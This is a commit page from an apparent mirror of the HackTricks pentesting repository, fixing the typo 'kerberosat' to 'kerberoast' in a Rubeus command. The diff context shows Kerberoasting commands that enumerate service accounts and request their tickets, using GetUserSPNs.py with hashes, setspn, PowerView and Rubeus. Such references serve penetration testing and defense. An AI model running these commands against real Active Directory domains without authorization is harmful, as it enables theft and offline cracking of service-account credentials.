mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 09:27:32 +00:00
Fix typo from "kerberosat" to "kerberoast"
This commit is contained in:
parent
bd0b87e02c
commit
09291a1571
1 changed files with 1 additions and 1 deletions
|
@ -52,7 +52,7 @@ GetUserSPNs.py -request -dc-ip 192.168.2.160 -hashes <LMHASH>:<NTHASH> <DOMAIN>/
|
||||||
# Get Kerberoastable users
|
# Get Kerberoastable users
|
||||||
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
|
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
|
||||||
Get-NetUser -SPN | select serviceprincipalname #Powerview
|
Get-NetUser -SPN | select serviceprincipalname #Powerview
|
||||||
.\Rubeus.exe kerberosat /stats
|
.\Rubeus.exe kerberoast /stats
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Technique 1: Ask for TGS and dump it from memory**
|
* **Technique 1: Ask for TGS and dump it from memory**
|
||||||
|
|
Loading…
Reference in a new issue